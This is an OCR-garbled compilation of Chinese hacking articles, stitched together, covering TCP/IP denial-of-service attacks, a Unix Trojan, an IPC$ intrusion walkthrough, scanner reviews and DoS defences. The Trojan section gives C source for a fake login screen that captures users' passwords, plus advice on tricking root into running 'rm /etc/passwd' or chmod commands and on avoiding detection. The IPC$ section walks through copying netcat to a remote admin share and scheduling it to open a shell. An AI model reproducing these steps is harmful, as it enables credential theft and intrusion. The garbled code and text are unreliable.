破壞TCP/IP

一個利用TCP/IP協議軟件弱點進行進攻的經典的例子是PingofDeath攻擊.利用的具體

方法是，你的對手創建一個超過了IP標準的最大長度-65535個字節的IP數據包.當這個“浮

腫的”數據包到達的時候，它就使得一個使用脆弱的TCP/IP協議軟件和操作系統的服務器癱

瘓.

所有現代的操作系統和協議軟件對PingofDeath攻擊都有免疫力，但是老的Unix系統可

能仍然是脆弱的.

另一個利用粗制濫造的TCP/IP軟件進行攻擊的例子是Teardrop,它利用了系統重組IP

數據包過程中的漏洞.一個數據包在從互聯網的另一端到你這里的路上也許會被分拆成更小

的數據報文.這些數據報中的每一個都擁有最初的IP數據報的報頭，同時還擁有一個偏移字

節來標示它擁有原始數據報中的哪些字節.通過這些信息,一個被正常分割的數據報文能夠在

它的目的地被重新組裝起來，并且網絡也能夠正常運轉而不被中斷.當一次Teardrop攻擊開始

時,你的服務器將受到擁有重疊的偏移字段的IP數據包的轟炸.如果你的服務器或是路由器

不能丟棄這些數據包而且如果企圖重組它們，你的服務器就會很快癱瘓.如果你的系統被及時

更新了，或者你擁有一個可以阻擋Teardrop數據包的防火墻，你應該不會有什么麻煩.

利用TCP/IP協議本身的漏洞來進行攻擊的手段也很多.這些手段中最流行的就是SYN

攻擊.SYN工作的原理就是利用兩個互聯網程序間協議握手的過程進行的攻擊.協議握手的

過程如下,其中一個應用程序向另一個程序發送一個TCPSYN（同步）數據包.然后目標程序向

第一個程序發送一個TCP-ACK應答數據包作為回答;第一個程序最后用一個ACK應答數據

包確認已經收到.一旦這兩個程序握手成功，它們就準備一起運行了.

SYN攻擊用一堆TCPSYN數據包來淹沒它的受害者.每個SYN數據包迫使目標服務器

產生一個SYN-ACK應答數據包然后等待對應的ACK應答.這很快就導致過量的SYN-ACK

一個接一個的堆積在緩存隊列里.當緩存隊列滿了以后，系統就會停止應答到來的SYN請求.

如果SYN攻擊中包括了擁有錯誤IP源地址的SYN數據包，情況很快就會變得更糟.在這種情

況下，當SYN-ACK被送出的時候,ACK應答就永遠不會被收到.飛快充滿的緩存隊列使得合

法程序的SYN請求無法再通過.

更加厲害的是，與之相似的and攻擊手段使用欺騙性的SYN數據包，它帶有一個偽裝的IP

地址,使得它看起來像是來自你自己的網絡.現在,SYN攻擊就像是來自于你防火墻的內部，這

使得問題更加嚴重.

大多數時新的操作系統和防火墻可以阻止SYN攻擊.另一個簡單的阻止SYN攻擊的方

法是阻塞掉所有帶有已知的錯誤的IP源地址的數據包.這些數據包應該包括帶有錯誤的為內

部保留的IP地址的外部數據包,它的范圍是從到10.255.255,255,到

55,從到55以及從到55

UNIX下的特洛伊木馬

“UNIX安全”是種矛盾的說法。UNIX系統是很容易就可以用暴力法攻破，因為大多

數UNIX系統并沒有設置登錄次數限制，而且還有諸如root、bin、sys、uucp等缺省用戶。

一旦進入了系統，就很容易獲得系統控制權。如果懂得C語言，你甚至可以使系統為你工

作，完全除去系統的安全屏障，建立自己的帳號，讀取別人的文件，等等。這些事情都可以

通過本文中簡單的C語言代碼來實現。

需求：

苜先，你需要有一個有效的UNIX系統帳號。如果該UNIX系統是運行在如PDP/U、

VAX、Pyramid等機器.上的相對簡單的UNIX系統（如4.2bsd或AT&TSystemV等），則則

會獲得很好的效果。如果你在學校擁有一個基于這些系統的帳號，那就再好不過了。

注釋：

本文的起因是1986年4月刊登的一篇題目為“UNIX安全”的文章。在這篇文章中，

作者說到：“我們希望，我們所提供的資料在一定程度上引起人們的興趣和避免UNIX過于

容易成為“駭客們的食譜”。因此我們有意省略了某些細節。”于是我根據這篇文章的大綱，

按照其中談到的方法，編寫出以下清晰完整的例子。

實例一：騙取密碼

只要有一點UNIX和C知識，你會發現做到這一點根本不難。但是，你首先必須有權

訪問一臺許多人都可以使用的計算機，如學校中的公用計算機。

當登錄到一個UNIX系統時，會出現類似以下內容的屏幕：

TiburonSystems4.2bsd/SystemV(shark)ogin:shark

Password:(無回顯)

以下程序模擬了一個登錄過程。你在終端上運行該程序后就離開。那些無知的“笨蛋”

會上來輸入他們的帳號和密碼，這些都會保存在一個文件里。然后屏幕顯示“oginincorreci”

(登錄錯誤)，并要求這個“笨蛋”再次登錄。這一次才是真正的登錄程序，當然會成功登

錄了(真是一群"笨蛋

把以下程序代碼輸入名為“horse.c”的文件中。注意，你需要針對不同系統的顯示更改

程序的前8行。

CodeBeginsHere

/*(hisiswhata'C,commcntooksike.Youcancavethemout.*/

/*#define,sareikemacrosyoucanuseforconfiguration.*/

#defineSYSTEM"\n\nTiburonSystems4.2bsdUNIX(shark)\n\n"

/*Thcabovcstringshoudbcmadctoookikethcmcssagcthatyour

*systemprinlswhenready.Each\nrepresentsacarriageretum.*/

#defineOGIN"ogin:"

/*Thcabovcistheoginprompt.Youshoudn'thavctochangeit

*unessyou'rerunningsomestrangeversionofUNIX.*/

#definePASSWORD"password:"

/^hcabovcisthcpasswordprompt.Youshoudn'thavctochangc

*it,either.

*/

#dcfincWAIT2

/*ThenumericavaueassignedtoWAITisthedeayyougetafter

*"password:"andbefore"oginincorreet."Changeit(0=amost

*nodcay,5=ONGdcay)soitooksikcyoursys(cm,sdeay.

*reaismisthekeyhere-wedon'twantourtargettobecome

"suspicious.

*/

#defineINCORRECT"oginincorrect.\n"

/*Changetheabovesoitiswhatyoursystemsayswhenanincorrect

*oginisgiven.Youshoudn'thavetochangeit.

*/

#defineFIENAME"stufr

/*FIENAMEisihenameofthefiethat(hehackedpasswordswi

*beputintoautomaticay.'stuffisaperfectygoodname.

*/

/*Don'tchangetherestoftheprogramunessthereisaneedto

*andyouknow'C\

?/

#incude<curses.h>

#incude<signa.h>

intstopO;

main()

{chamame[10],password[10];

inti;FIE*fp,*fopen();

signa(SIGINT,stop);

initscr();

printf(SYSTEM);

printf(OGIN);

scanff1AAn]”,name);

getchar();

noecho();

printf(PASSWORD);

scanf("[A\n]”,password);

printfC'Vn");

getchar();

ccho();

seep(WA.IT);

if((fp=fopen(FIENAME,"a"))!=NU){#fprintf(fp,"oginshaspasswords\n",name,password);

#fcosc(fp);#}printf(INCORRECT);cndwin();}

stop(){endwin();exit(0);)

SourceEndsHere

OK,正如我所說的，輸入以上代碼，并修改它，使它看起來與真正的登錄過程完全一

致。編譯horse.c文件。(不必輸入，它只是系統提示符。)

cchorse.c-curses-termcap

mva.outhorsc

現在你已有了可執行文件ho邙e。運行它，如果所顯示的內容與真正的登錄過程不一樣,

便重新編輯horse.c源程序，并重新編譯。在使用木馬程序前，建立名為irap(或者其他名

字)的文件，內容如下：

horse(運行木馬程序)

ogin(運行系統登錄程序)

執行trap文件：

sourcetrap(重復：不要輸入)

然后離開終端…

程序運行幾次后，檢查stuff文件(或者你定義的任何文件)，其內容應類似如下：

useijohnhaspasswordsecret

usermarj^aspasswordsmegma

etc.

記錄下這些帳號和密碼，然后刪除這個文件。(否則，如果超級用戶看到這個文件，你

可就危險了。)

,,chmod666/etc/passwd"

/etc/passwd是系統密碼文件，只有root用戶可以讀寫，在一般情況下，其他用戶只能讀

（密碼是經加密的）。如你不清楚其結構格式，可以查看它。上面的命令使你也可以讀寫該

文件——如為自己和朋友建立無權限限制的帳號。

"chmod666/etc/group"

通過把自己加入某些具有高級權限的組，你便可以為所欲為了。

"chmod666/usr/ib/uucp/.sys"

檢查這個文件確定這個系統是否在UUCP（UNIX-UNIXCONNECTIONPROTOCO）網

絡上。此文件包含了訪問網絡中其他系統的撥號用戶和密碼，以一般情況下，只有UUCP

管理員能讀取它。找到UUCP管理員帳號并誘使其在不知情的情況下運行以上代碼，你便

可以讀取它了。

"rm/etc/passwd"

如果你誘使root用戶運行這行代碼，就會刪除系統密碼文件，此系統將停機，并且不

能再次運行了。這是具有相當破壞力的。

當你準備向系統放置特洛伊木馬，有幾條規則應該注意。

如果隱蔽性是主要的，（如侵入用戶郵箱或刪除他的所有文件等,）那么這個程序不應該

被過多地執行（如一個流行的電腦游戲）旦用戶發現他們的文件被允許完全訪問，那

么他是比較容易找到原因的。為了加強木馬的隱蔽性，程序應該表明為“測試”程序（比如

你正在編寫的游戲），并且請求個別人運行它，并與他們“交流”意見（只是為了欺騙他們）。

正如我所說的，“測試”程序在完成其任務后，可以顯示虛假的錯誤消息。你便可以對他們

說：“唉呀，我想我要繼續修改它。”在他們離開后，你便可以讀取已被你解鎖的文件了。

如果木馬程序的主要目的是捕捉運行此程序的特定用戶——如root或其他高級用戶，

你就應該把木馬程序代碼放入可被系統中絕大多數用戶頻繁執行的程序里。因為木馬程序在

特定用戶運行前是隱匿的。

如果你發現C語言代碼很難理解，你就必須從PASCA語言等轉變過來并學會C語言。

這種情況不會有損C語言作為一種偉大的編程語言。

以上我們已經看到在UNIX系統上怎樣做了。一旦你捕捉到了用戶（如你可以修

/etc/passwd文件），就要從特洛伊木馬程序中刪除有關欺騙的代碼，這樣你就永遠不會被捉

住了。

詳解0＜：$入侵方法

一、什么是IPC$漏洞

IPC$是共享“命名管道”的資源，它對于程序間的通訊很重要。在遠程管理計算機和

查看計算機的共享資源時使用。利用IPC$我們可以與目標主機建立一個空的連接（無需用

戶名與密碼），而利用這個空的連接，我們就可以得到目標主機上的用戶列表。用“流光”

的IPC$探測功能，就可以得到用戶列表了，并可以配合字典，進行密碼嘗試。

二、駭客是如何利用《＜：$漏洞

我們要使用到的工具有：

1.流光4.6（）有提供下載！流光禁止掃描國內的主機，請不要打免IP的補丁，否則你

就會覺得流光更本沒有用處，榕哥這樣做的原因也是希望駭客不要破壞國內主機！

其實并不需要我們使用很多工具，因為流光一個就可以幫我們搞定了！

2.SRV這個工具也在流光的目錄中，很多防火墻將他列為病毒，其實這是一個很好的工

具。全名是NetCat,這里改名為Srv.exe。用于在主機建立一個端口為99的she。然后我們

就可以TENET1P99上去了。

3.Ntm.exe：是榕哥寫的一個程序，用于修改Windows2000TcnctScrvcry身份驗證的方式。

測試IP：

熟悉了使用工具的話，下面我們來看看駭客是怎么入侵的。

第一步：運行流光4.6（如下圖所示）

按CTR+R鍵彈出掃描框，我們這里只是做個測試，目的是告訴大家這個漏洞的危害，

所以我們現在隨便選擇一段IP進行掃描。我們掃描的是

其他的我們使用默認，不需要改變設置

第二步：大家打開WIN2000自帶的命令提示行，注意：這里我們不是教大家怎么破壞,

只是給大家介紹這個漏洞的危害，所以下面的IP是假設的，并不存在。

C:\>neiuse\\127.0.0.NPC$"/user:"admin【itralors"〃這是我用流光掃到的密碼~~~我們就

拿它開刀吧~上面的意思是與建立一個連接，因為我們使用流光己經掃到用戶名是

administrators,密碼為［空］,所以第?個雙引號那里不用輸入什么，后面一個雙引號里的是

用戶名，我們輸入administralors//命令成功完成。

首先大家先把需要用到的工具COPY的你自己的C盤下，就是在流光TOOS中。

C:\>copysrv.exe\\匕dmin$〃先復制srv.exe上去，在流光的Toos目錄就有。（這里的

ADMIN$是指ADMIN用戶的c:\winnt\system32\大家還可以使用c$,d$這個的意思是C盤與

D盤，這看你要復制到什么地方去了）

已復制1個文件。（成功了！*.*）

C:\>neUime\H27Q0.1〃查查時間。（這里的時間是指對方計算機的，也就是我們要入侵的

127Q0.I的時間，還有要提醒大家要注意的一點是，請把時間轉換為24小時制，因為不少

朋友問過我為什么自動不了服務，其實就是因為時間的問題）/A\127.0.（M的當前時間是

2002/3/19上午11:00命令成功完成。

C:\>at\\1195srv.exe〃用at命令啟動srv.exe吧~!（這里設置的時間要比主機時間

快，不然你怎么啟動啊，呵呵！）〃新加了一項作業，其作業ID=lC:\>nenime\\〃再

查查夠時間沒有？！哈！時間到，ETSGOFOOWME!/N12Z0.0.1的當前時間是2002/3/19上

午11:05命令成功完成。

C:\Kenetl27.O.O.I99〃我們tenet吧，注意端口是99哦,TENET默認的是23端口，但是

我們使用的是SRV在對方計算機中為我們建立一個99端口的SHE。〃〃哈哈！進來了耶！

再給他加上一個ntmC:\>copyntm.exe\\\admin$〃我們再開一個DOS窗口，把ntm.exe

上傳到主機上。（也是在流光流光的Toos目錄）

已復制1個文件。

C:\WINNT\syslem32>nlm//我們輸入ntm啟動吧。（這里的C:\WINNT\system32〉指的是

對方計算機，我們運行ntm其實是讓這個程序在對方計算機上運行）//ntm

Windows2000TcnctDump,byAssassin,ARightsRcservcd.

Done!//OK了

C:\WINNT\sysiem32〉

C:\WINNT\sysiem32>neislarUeneU/然后直接用neistarttenet啟動tenet

Tenet服務器正在啟動.

Tenet服務器己經啟動成功。〃哈哈，我們成功了，該上去了

第三步：我們使用TENET到對方計算機上去

TENET

接著輸入用戶名與密碼就進入了

（我們已經進來了，使用方法和DOS命令是一樣的）

這就是中國黑客入侵美國計算機的方法,在這之前是不是讓你覺得很神秘呢？其實很簡

單的。不要認為這就是黑客的方法，這只能說是駭客。最后希望大家不要那這種方法來實踐

國內主機，否則我就成罪人了。

三、如何防范》^$漏洞

看來上面的方法是不是覺得該檢測一下自己是否有這個漏洞，還不趕快把這個漏洞給補

上？跟我來吧，下面我們將教你如何防范IPC$的入侵

解決方法

1、禁止建立空連接

(HKEY_OCA_MACHINE\SYSTEM\CurrenlControSet\Contro\SA]

RestrictAnonymous=DWORD:00000001

2、禁止管理共享

(HKEY_OCA_MACHINE\SYSTEM\CurrenlControSet\Services\anmanServer\Paramelers]

AutoShareServer=DWORD:00000000

3.到deshare.zip

4.如果您覺得麻煩的話這樣也可以，netshareipc$/deete把這個放進你的啟動欄里面去

5.如果上面的方法您不會的話，這個方法可以說是最簡單的了。把您的密碼設置復雜一

下，一面被一些不懷好意的人使用工具給破出來。不過想提醒大家一點，在復雜的密碼都有

可能被破解

評價幾款黑客常用的攻擊工具

隨著企業網絡復雜性的增加，它也更容易受到攻擊。各種各樣的操作系統都有其特定的

配置，每個都在高度連接環境中高速運行著無數的設備和應用，結果由于意想不到的漏洞、

小故障和后門等，使得網管員直到闖入者使用未經授權的網絡資源時，才意識到破壞的存在。

一種連根鏟除網絡中的弱點的方式是掃描。大批基于軟件的掃描工具可探測網絡中的操

作系統、應用、口令等易受攻擊的部位。事實上，在攻擊之前，欲闖入者使用這些工具來打

開網絡，因而掃描也是一種提前發現網絡裝甲上的裂縫的安全預防措施。

根據現有的技術知識水平，必須決定是自己掃描還是租用掃描服務。如果自己掃描，可

以選擇商業工具、開放資源或免費軟件工具。

有很多開放資源和免費軟件工具，如Nmap是黑客編寫的。為什么合法的網絡管理員有

時也會使用黑客工具？因為使用此類工具不僅對測試網絡的安全環境非常有效率,而且對了

解闖入者到底是怎樣闖入網絡的很有益處。但是，商業軟件包具有同樣的功能，而且有便于

使用的界面和報告功能。

Ping命令和端口數

漏洞掃描是從黑客的眼光來審視網絡的。表面上兩臺機器之間的通信暴露出了潛在的漏

洞信息，掃描工具把這些網絡信息與開發數據庫進行匹配，以決定哪個可以在網絡中表述。

漏洞掃描由三個基本步驟構成。第一步是網絡發現，使用Ping命令發現活躍的網絡設

名。Ping命令把因特網控制信息協議(ICMP)分組發送到目標系統，尋找響應，這建立了闖

入者能作為攻擊目標個體的活躍主機的基本地圖。

第二步是端口掃描，辨認出那些在偵聽方式的端口以及可利用的活躍服務的端口。端口

掃描也能辨認出目標上的操作系統，包括安裝的是哪個服務包或者內核發布。要注意，僅發

現偵聽端口并不意味著漏洞。有時，闖入者必須探究更多的包操作以獲取有潛在破壞性的信

息。

在最后一步中，掃描器分析數據并產生報告，詳細描述潛在的漏洞和補救辦法。因為報

告數據至關重要，需要選擇一種清晰并有效地顯示結果的解決方案。在購買或使用任何掃描

器之前，應花些時間仔細審查報告樣品。

口令攻擊者

口令審計軟件是另一種對闖入者和管理人員都有用的評估工具。管理人員使用這樣的工

具審計用戶口令,保證其遵守正確的口令策略。許多開放資源口令攻擊者可以在因特網得到,

很多商業安全掃描器也包括口令審計。

第一個WindowsNT口令攻擊工具是OphiCrack,由OphiHeavylndustries集團開發。

WindowsNT通過把純文本轉換為無意義的字節串的加密方式隱藏口令，即哈希表方法。問

題是NT必須也能支持舊的哈希表算法，以和AN管理器兼容。因為OphtCrack已經反向設

計了AN管理器口令加密功能，它生產同樣的哈希結果。因此，OphlCrack僅僅匹配哈希表,

而不解密口令。

產品通過二種方式利用這一缺點。首先，字典攻擊收集常作為口令的詞，并在其上運行

哈希第法：其次，它比較這個清單和NT哈希表，尋找匹配。如果找不出匹配，程序下一步

給字典清單中的詞添加隨機字符：最后，如果仍不成功，它運行一次強力攻擊，嘗試每一個

字母和符號的可能組合直到發現一個匹配。

上述情況聽起來就好像任何運行OphtCrack的熟手都能解開你的口令，但潛在的攻擊者

仍必須克服幾個障礙：首先，攻擊者必須得到儲存NT哈希表的安全賬號管理器(SAM)文件,

這要求在目標機上有管理員權限；其次，由于SAM文件和哈希表匹配需要時間，因而

OphtCrack也必須脫機運行。用OphtCrack攻擊口令的更復雜的方式可以功過查看更多信息

資源了解。

掃描和掃描器

在購買或下載最新和最好的網絡掃描器之前，應花一些時間尋找符合目標的工具。

很重要的一點是產品的易使用性。如果你喜歡圖形用戶界面而不是命令行界面，你可能

會傾向于商業產品。但是，沒人能阻止你既使用商業軟件又使用免費軟件工具。

當選擇產品時，要確保它按優先順序列出漏洞。全面展開掃描可以產生一份幾百頁的報

告。如果你知道哪個問題是必須馬上處理的，列出這樣的清單更便于管理。

應該知道掃描會影響網絡的性能，達到什么程度取決于掃描的深度和設備的數目。確定

掃描時間，使其最不可能影響重要的業務，同時，尋找允許你定位特定系統的工具。你可能

希望能更經常地掃描網絡特定的部分，事實上，用消耗資源的分組檢測來檢測你的設備是沒

有什么意義的。

發現漏洞數據庫更新的頻度。像病毒一樣，新漏洞總是不斷出現，所以工具應該是能跟

上最新攻擊方式的。換句話說，有不同的列表和不同的計算漏洞的方式，這樣不會被很大的

數目搞得眼花繚亂。產品A可能顯示發現1萬處漏洞，而產品B則檢測出5千處，這并不

意味產品A更好。

可能人們也關心供應商是從什么地方得到漏洞信息的。當每一個銷售商利用如CERT、

BugTraq和SANS研究所等組織的公共郵件時，很多供應商也有機構內部研究隊伍，在廣泛

發布之前，已使你認識到安全漏洞的存在。

清掃

假設你已從頭到尾徹底檢查了你的網絡，已發現了漏洞、閱讀了報告并應用了補丁程序。

現在的網絡是百分之百安全了，至少直到聰明的編碼器發現一種全新的讓分組通過你的防火

墻的方式。

漏洞掃描不是一次性的補救，因為黑客能不斷發現新漏洞。此外，軟件供應商正不斷發

布他們產品的新版本，即使剛剛買到的新軟件都可能有未預知的漏洞，或者以意想不到的方

式和你的網絡相互影響。

掃描的頻率應取決于安全狀況，以及網絡設備的生命期。如果體系結構相對穩定，很少

更動或升級，可以少一些掃描。但是，特別敏感的網絡部分，則應保證經常檢查。

總之，應準備在以后的掃描和清掃中投入大量的時間。簡單地忽視他們對于發現漏洞沒

有任何幫助。

掃描和表述

在正常的TCP通信序列中，客戶機器和服務器必須檢查三步握手以建立聯系。客戶機

通過把SYN分組發送給服務器啟動握手。如果服務器是可用的，它用一個SYN/ACK分組

應答通信。最后，客戶發送自己的ACK分組并建立聯系。

闖入者能操縱上述握手序列，以收集基于服務器反應的重要信息，包括錯誤配置的操作

系統和有已知漏洞的軟件版本。

下列的端口掃描通常被用來對付目標主機。清單已由出版者同意發布，摘自《揭露黑客》,

第二版(Osborne/McGrawHi,2001),由JoeScambray、StuartMcCure和GeorgeKurtz著。TCP

連接掃描。這種掃描和目標端口與完整的三步握手(SYN,SYN/ACK和ACK)相聯系。很容

易被目標系統檢測到。

TCPSYN掃描。該技術被稱為半開放掃描，因為未建立完整的TCP連接，而是給目標

端口發送SYN分組。如果SYN/ACK被目標端口收到，我們能推斷出它是在偵聽狀態中。

如果RST/ACK被收到，它通常表示端口沒在偵聽。執行端口掃描的系統將發送RST/ACK,

這不會建立完整的連接。這種技術有比完全的TCP連接更隱蔽的優勢，它可能不會被目標

機登錄。

TCPFIN掃描。該技術把FIN分組發送給目標端口。基于RFC793,目標系統應該向所

有關閉端口回送RSTo這技術通常僅對基于Unix的TCP/IP協議棧產生影響。

TCPXmasTree掃描。該技術是把FIN,URG和PUSH分組發送給目標端口。基于RFC793,

目標系統應該向所有關閉端口回送RSTo

TCPNu掃描。該技術關閉所有的標識，基于RFC793,目標系統應該向所有關閉端口I可

送RST。

TCPACK掃描。該技術設計出防火墻規則集，能幫助識別防火墻是一個僅允許建立的

聯系(有ACK位設置的連接)。通過簡單分組過濾還是執行高級包過濾的嚴密防火墻。

TCPWindows掃描。該技術可以檢測某些系統的開放及過濾/無過濾端口(例如AIX和

FreeBSD)。它是根據未按常規報告TCP窗口大小判斷。

TCPRPC掃描。這是Unix系統所特有的技術，能檢測和識別遠程過程調用(RPC)端口和

相應的程序及版本號。

資源

《揭露黑客》第二版的作者是JoeScambray、SiuartMcCure和GeorgeKurtz,其中有幾章

在漏洞掃描、安全漏洞和口令攻擊方面有深入描述。

可以從開發者網站下載掃描工具Nmapo該站點也有安全漏洞清單和與其他掃描工具和

安全站點的連接。

信息安全雜志2000年7月到2000年10月發表了有關漏洞評估的四部分的系列文章。

Web站點WindowsITSecurity討論了如何在Windows2000系統下使用OphlCrack。

拒絕服務攻擊原理及解決方法

Inlernei給全世界的人們帶來了無限的生機，真正實現了無國界的全球村。但是還有很多

困繞我們的因素，象IP地址的短缺，大量帶寬的損耗，以及政府規章的限制和編程技術的

不足。現在，由于多年來網絡系統累積下了無數的漏洞，我們將面臨著更大的威脅，網絡中

潛伏的好事者將會以此作為缺口來對系統進行攻擊，我們也不得不為以前的疏忽付出更大的

努力。雖然大多的網絡系統產品都標榜著安全的旗號，但就我們現在的網絡協議和殘缺的技

術來看，危險無處不在。

拒絕服務攻擊是一種遍布全球的系統漏洞，黑客們正醉心于對它的研究，而無數的網絡

用戶將成為這種攻擊的受害者。TribeFoodNelwork,tfn2k,smurf,larga…還有許多的程序都在被

不斷的開發出來。這些程序想癥疫一樣在網絡中散布開來，使得我們的村落更為薄弱，我們

不得不找出一套簡單易用的安全解決方案來應付黑暗中的攻擊。

在這篇文章中我們將會提供：

對當今網絡中的拒絕服務攻擊的討論。

安全環境中的一些非技術性因素以及我們必須克服的一些障礙問題。

如何認清產品推銷商所提供的一些謊言。

在我們正式步入對這些問題的技術性討論之前，讓我們先從現實的生活中的實際角度來

看一下這些困繞我們的問題。

當前的技術概況

在我們進入更為詳細的解決方案之前.，讓我們首先對問題做一下更深入的『解。

與安全相關的這些小問題如果詳細來講的話都能成為一個大的章節，但限于篇幅的原

因，我們只能先作一下大體的了解。

軟件弱點是包含在操作系統或應用程序中與安全相關的系統缺陷，這些缺陷大多是由于

錯誤的程序編制，粗心的源代碼審核，無心的副效應或一些不適當的綁定所造成的。根據錯

誤信息所帶來的對系統無限制或者未經許可的訪問程度，這些漏洞可以被分為不同的等級。

典型的拒絕服務攻擊有如下兩種形式：資源耗盡和資源過載。當一個對資源的合理請求

大大超過資源的支付能力時就會造成拒絕服務攻擊（例如，對已經滿載的Web服務器進行

過多的請求。）拒絕服務攻擊還有可能是由于軟件的弱點或者對程序的錯誤配置造成的。區

分惡意的拒絕服務攻擊和非惡意的服務超載依賴于請求發起者對資源的請求是否過份，從而

使得其他的用戶無法享用該服務資源。

錯誤配置也會成為系統的安全的患。這些錯誤配置通常發生在硬件裝置，系統或者應用

程序中。如果對網絡中的路由器，防火墻，交換機以及其他網絡連接設備都進行正確的配置

會減小這些錯誤發生的可能性。如果發現了這種漏洞應當請教專業的技術人員來修理這些問

題。

如果換個角度，也可以說是如下原因造成的：

錯誤配置。錯誤配置大多是由于一些沒經驗的，無責任員工或者錯誤的理論所導致的。

開發商一般會通過對您進行簡單的詢問來提取一些主要的配置信息，然后在由經過專業培訓

并相當內行的專業人士來解決問題。

軟件弱點。由于使用的軟件幾乎完全依賴于開發商，所以對于由軟件引起的漏洞只能依

靠打補丁，安裝hotfixes和Servicepacks來彌補。當某個應用程序被發現有漏洞存在，開發

商會立即發布一個更新的版本來修正這個漏洞。

拒絕服務攻擊。拒絕服務攻擊大多是由于錯誤配置或者軟件弱點導致的。某些DoS攻

擊是由于開發協議固有的缺陷導致的，某些DoS攻擊可以通過簡單的補丁來解決，還有一

些導致攻擊的系統缺陷很難被彌補。最后，還有一些非惡意的拒絕服務攻擊的情況，這些情

況一般是由于帶寬或者資源過載產生瓶頸導致的，對于這種問題沒有一個固定的解決方案。

深入DoS

DoS的攻擊方式有很多種。最基本的DoS攻擊就是利用合理的服務請求來占用過多的

服務資源，致使服務超載，無法響應其他的請求。這些服務資源包括網絡帶寬，文件系統空

間容量，開放的進程或者向內的連接。這種攻擊會導致資源的匱乏，無論計算機的處理速度

多么快，內存容量多么大，互連網的速度多么快都無法避免這種攻擊帶來的后果。因為任何

事都有一個極限，所以，總能找到一個方法使請求的值大于該極限值，因此就會使所提供的

服務資源匱乏，象是無法滿足需求。千萬不要自認為自己擁有了足夠寬的帶寬就會有一個高

效率的網站，拒絕服務攻擊會使所有的資源變得非常渺小。

傳統上，攻擊者所面臨的主要問題是網絡帶寬，由較小的網絡規模和較慢的網絡速度,

無法使攻擊者發出過多的請求，然而，類似"ihcpingofdeath”的攻擊類型緊需要很少量的包就

可以摧毀一個沒有打過補丁的UNIX系統。當然，多數的DoS攻擊還是需要相當大的帶寬

的，但是高帶寬是大公司所擁有的，而以個人為主的黑客很難享用。為了克服這個缺點，惡

意的攻擊者開發了分布式的攻擊。這樣，攻擊者就可以利用工具集合許多的網絡帶寬來對同

一個目標發送大量的請求。

以下的兩種情況最容易導致拒絕服務攻擊：

由于程序員對程序錯誤的編制，導致系統不停的建立進程，最終耗盡資源,只能重新啟

動機器。不同的系統平臺都會采取某些方法可以防止一些特殊的用戶來占用過多的系統資

源，我們也建議盡量采用資源管理的方式來減輕這種安全威脅。

還有一種情況是由磁盤存儲空間引起的。假如一個用戶有權利存儲大量的文件的話，他

就有可能只為系統留下很小的空間用來存儲日志文件等系統信息。這是一種不良的操作習

慣，會給系統帶來隱患,這種情況下應該對系統配額作出考慮。

從安全的角度來看，本地的拒絕服務攻擊可以比較容易的追蹤并消除。而我們這篇文章

主要是針對于網絡環境下的DoS攻擊。下面我們大體討論一下較為常見的基于網絡的拒絕

服務攻擊：

Smurf（directedbroadcast）,＞廣播信息可以通過一定的手段（通過廣播地址或其他機制）

發送到整個網絡中的機器。當某臺機器使用廣播地址發送一個ICMPecho請求包時（例如

PING）,一些系統會向應一個ICMPechoI可應包，也就是說，發送一個包會收到許多的響應

包。Smurf攻擊就是使用這個原理來進行的，當然，它還需要一個假冒的源地址。也就是說

在網絡中發送源地址為要攻擊主機的地址，目的地址為廣播地址的包，會使許多的系統響應

發送大量的信息給被攻擊主機（因為他的地址被攻擊者假冒了）。使用網絡發送一個包而引

出大量回應的方式也被叫做“放大器"，這些smurf放大器可以在網站上獲得，一些無能的且

不負責任的網站仍有很多的這種漏洞。

SYNfooding一臺機器在網絡中通訊時首先需要建立TCP握手,標準的TCP握手需要三

次包交換來建立。一臺服務器一旦接收到客戶機的SYN包后必須回應一個SYN/ACK包，

然后等待該客戶機回應給它一個ACK包來確認，才真正建立連接。然而，如果只發送初始

化的SYN包，而不發送確認服務器的ACK包會導致服務器一直等待ACK包。由于服務器

在有限的時間內只能響應有限數量的連接，這就會導致服務器一直等待回應而無法響應其他

機器進行的連接請求。

Sashdoteffect這種攻擊手法使web服務器或其他類型的服務器由于大量的網絡傳輸而過

載，一般這些網絡流量是針對某一個頁面或一個鏈接而產生的。當然這種現象也會在訪問量

較大的網站上正常發生，但我們一定要把這些正常現象和拒絕服務攻擊區分開來。如果您的

服務器突然變得擁擠不堪，甚至無法響應再多的請求時，您應當仔細檢查一下這個資源匱乏

的現象，確火在10000次點擊里全都是合法用戶進行的，還是由5（X）0個合法用戶和一個點

擊了5000次的攻擊者進行的。

拒絕服務一般都是由過載導致的，而過載一般是因為請求到達了極限。

拒絕服務攻擊的發展

由于我們防范手段的加強，拒絕服務攻擊手法也在不斷的發展。

TribeFoodNeiwork（tfn）和tfn2k引入了一個新概念：分布式。這些程序可以使得分散在

互連網各處的機器共同完成對一臺主機攻擊的操作，從而使主機看起來好象是遭到了不同位

置的許多主機的攻擊。這些分散的機器由幾臺主控制機操作進行多種類型的攻擊，如

UDPfood,SYNfood等。

操作系統和網絡設備的缺陷在不斷地被發現并被黑客所利用來進行惡意的攻擊。如果我

們清楚的認識到了這一點，我們應當使用下面的兩步來盡量阻止網絡攻擊保護我們的網絡:

A）盡可能的修正已經發現的問題和系統漏洞。

B)識別，跟蹤或禁止這些令人討厭的機器或網絡對我們的訪問。

我們先來討論一下B),在B)中我們面臨的主要問題是如何識別那些惡意攻擊的主機,

特別是使用拒絕服務攻擊的機器。因為這些機器隱藏了他們自己的地址，而冒用被攻擊者的

地址。攻擊者使用了數以千記的惡意偽造包來使我們的主機受到攻擊。"tfn2k"的原理就象上

面講的這么簡單，而他只不過乂提供了一個形象的界面。假如您遭到了分布式的拒絕服務攻

擊，實在是很難處理。

解決此類問題的一些專業手段-一包過濾及其他的路由設置

有一些簡單的手法來防止拒絕服務式的攻擊。最為常用的一種當然是時刻關注安全信息

以期待最好的方法出現。管理員應當訂閱安全信息報告，實時的關注所有安全問題的發展。：)

第二步是應用包過渡的技術，主要是過濾對外開放的端口。這些手段主要是防止假冒地

址的攻擊，使得外部機器無法假冒內部機器的地址來對內部機器發動攻擊。

我們可以使用CiscoiOS來檢查路由器的詳細設置，當然，它也不僅限于Cisco的設備，

但由于現在Cisco設備在網絡中占有了越來越多的市場份額(83),所以我們還是以它為例

子，假如還有人有其他的例子，我們也非常高興你能提出您的寶貴信息。

登陸到將要配置的路由器上，在配置訪問控制列表之前先初始化一遍：

c3600(config)#access-istl00permitip55any

c36(X)(config)#access-istIOOdenyipanyany

然后我們假設在路由器的SO口上進行AC的設置，我們進入SO口，并進入配置狀態：

c3600(config)#intser0

